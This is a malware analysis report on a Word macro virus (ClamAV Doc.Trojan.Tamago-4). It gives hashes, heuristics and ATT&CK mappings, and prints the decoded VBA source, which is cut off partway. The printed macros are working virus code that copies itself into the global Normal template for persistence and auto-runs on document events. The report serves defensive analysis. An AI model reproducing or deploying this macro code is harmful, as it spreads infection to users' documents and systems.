Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd17e574c4aaa3d2…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 113.5 KB
Created: 2000-05-15 15:20:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 40331480e150752b56f763b068811bc9
SHA-1: 378359a11a4cc8fde32e52905b7f80d56393b274
SHA-256: bd17e574c4aaa3d2de058550d0957f84496d75b79a4407feafa8ef478aeee365
Risk score: 288

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

This legacy Word document contains multiple VBA macros, including AutoOpen, AutoClose, and AutoExec, which Word runs automatically on the corresponding events. The 'Infec' macro attempts to copy itself and the other malicious macros ('AutoExec', 'email', 'libvirus', 'AutoClose', 'AutoOpen') into the global template, which is a persistence mechanism: macros in the global template run in every document opened afterwards. The `Environ("LEGADO")` check suggests a specific environment variable is used as a kill switch or execution gate, and the `Shell()` call indicates the macro can execute arbitrary commands.

Heuristics (8)

  • ClamAV: Doc.Trojan.Tamago-4 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Tamago-4
  • VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44257 bytes
SHA-256: abb5a044c0313d4ec92d083f633edc9ff642ff3ad72f594f014cdff25f8e7c74

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ArquivoImprimir"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.ArquivoImprimir.MAIN"
WordBasic.Call "ImpreArq"  'possibly insert text.
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FilePrint(False)     'declare dialog of type FilePrint
WordBasic.CurValues.FilePrint dlg
WordBasic.Dialog.FilePrint dlg      'run the print dialog
WordBasic.FilePrint dlg       'perform actions from dialog.
End Sub

Attribute VB_Name = "Infec"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Infec.MAIN"
Dim caminho$
caminho$ = Environ("LEGADO")
If caminho$ = "NOWAY" Then GoTo NoWay
On Error GoTo -1: On Error GoTo NoWay
On Error GoTo -1: On Error GoTo AutoExec
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":Infec", "Global:Infec", 1
AutoExec:
On Error GoTo -1: On Error GoTo email
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExec", "Global:AutoExec", 1
email:
On Error GoTo -1: On Error GoTo libvirus
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":email", "Global:email", 1
libvirus:
On Error GoTo -1: On Error GoTo AutoClose
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":libvirus", "Global:libvirus", 1
AutoClose:
On Error GoTo -1: On Error GoTo AutoOpen
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose", 1
AutoOpen:
On Error GoTo -1: On Error GoTo arqsalcomo
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoOpen", "Global:AutoOpen", 1
arqsalcomo:
On Error GoTo -1: On Error GoTo arqimp
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ArquivoSalvarComo", "Global:ArquivoSalvarComo", 1
arqimp:
On Error GoTo -1: On Error GoTo arqimppad
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ArquivoImprimir", "Global:ArquivoImprimir", 1
arqimppad:
On Error GoTo -1: On Error GoTo imparq
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ArquivoImprimirPadrão", "Global:ArquivoImprimirPadrão", 1
imparq:
On Error GoTo -1: On Error GoTo destruct
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ImpreArq", "Global:ImpreArq", 1
destruct:
On Error GoTo -1: On Error GoTo NoWay
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":Destruct", "Global:Destruct", 1
NoWay:
End Sub

Attribute VB_Name = "AutoExec"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoExec.MAIN"
WordBasic.Call "Infec"
WordBasic.Call "email"
WordBasic.Call "libvirus"
End Sub

Attribute VB_Name = "email"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.email.MAIN"
Dim versao$
Dim so$
Dim normal$
Dim nome$
Dim T
Dim tecla
On Error GoTo -1: On Error GoTo NoWay
versao$ = WordBasic.[GetSystemInfo$](24)
so$ = WordBasic.[GetSystemInfo$](21)
normal$ = ""
nome$ = "c:\precos.doc"
If WordBasic.[Files$](nome$) <> "" Then WordBasic.Kill nome$
If WordBasic.[Files$]("c:\winword\modelos\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\winword\modelos\normal.dot")
If WordBasic.[Files$]("c:\winword\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\winword\normal.dot")
If WordBasic.[Files$]("c:\msoffice\modelos\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\msoffice\modelos\normal.dot")
If WordBasic.[Files$]("c:\msoffice\models\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\msoffice\models\normal.dot")
If WordBasic.[Files$]("normal.dot") <> "" Then normal$ = WordBasic.[Files$]("normal.dot")
If WordBasic.[Files$]("modelos\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("modelos\normal.dot")

If normal$ = ""
... (truncated)